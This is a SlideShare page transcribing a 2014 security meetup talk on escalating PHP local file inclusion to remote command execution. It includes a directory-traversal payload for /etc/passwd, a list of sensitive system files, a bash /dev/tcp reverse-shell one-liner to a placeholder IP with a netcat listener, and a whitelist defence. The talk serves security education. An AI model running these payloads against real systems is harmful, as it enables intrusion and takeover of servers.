Your SlideShare is downloading. ×
0
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Local File Inclusion to Remote Code Execution

1,663

Published on

null Bangalore Chapter - March 2014 Meet

null Bangalore Chapter - March 2014 Meet

Published in: Education
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,663
On Slideshare
0
From Embeds
0
Number of Embeds
5
Actions
Shares
0
Downloads
43
Comments
0
Likes
3
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Local File Inclusion To Remote Command Execution [LFI <> RCE] By Sharath Unni
  • 2. Introduction  What is a file inclusion vulnerability?  How the attack works?  RFI/LFI vulnerable PHP functions  Traverse and read local files  PathTraversal / FI using scanners  Reverse shell via LFI  Other ways to inject your code  Defending yourself
  • 3. What is a file inclusion vulnerability?  Input validation  The application trusts/doesn’t validate the user input  The code includes/imports other pages  Dynamic including of the page  When PHP includes a file it will parse any PHP code within that file (“<?php” and “?>”) Do not trust the user…ever !!
  • 4. How the attack works? http://192.168.109.136/dvwa/vulnerabilities/fi/?page=include The code would be: <?php $file =$_GET[‘file']; include("/".$file .".php"); <--Vulnerable !! ?>  Assign page to "../../../../etc/passwd%00“ <?php $file =$_GET[‘file']; include("/../../../../etc/passwd%00.php"); <-- Directory Traversal to LFI ?> %00 (Null CHAR) will ignore everything that comes after %00 ../../../ will traverse path to root and goto /etc/passwd
  • 5. RFI/LFI vulnerable PHP functions include() include_once() require() require_once() fopen()
  • 6. Common locations  Normally, the following files are read: /etc/passwd /etc/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/httpd/conf/httpd.conf  Other Unix common locations
  • 7. Path Traversal / FI using scanners http://sectooladdict.blogspot.in/ OR http://sectoolmarket.com/
  • 8. We read the files, what next?
  • 9. Reverse shell via LFI  PHP script to open an outbound TCP connection <?php exec("bash -i >& /dev/tcp/<yourIP>/<port> 0>&1"); ?>  Go and catch the reverse shell nc –lp <port>
  • 10. Other ways to inject your code  Using directory traversal to read files  Log poisoning (access.log, error.log)  Session variables  Uploaded files  Emails  Shared hosting  FTP and other logs
  • 11. Defending yourself  <?php  $page_files=array( 'about'=>'about.html',  'photos'=>'photos.html',  'contact'=>'contact.html',  'home'=>'home.html'  );   if (in_array($_GET['page'],array_keys($page_files))) {  include $page_files[$_GET['page']];  } else {  include $page_files['home'];  }  ?>
  • 12. Thank You! 
  • 13. References  http://sectoolmarket.com/path-traversal-local-file- inclusion-detection-accuracy-of-open-source-web- application-scanners.html

×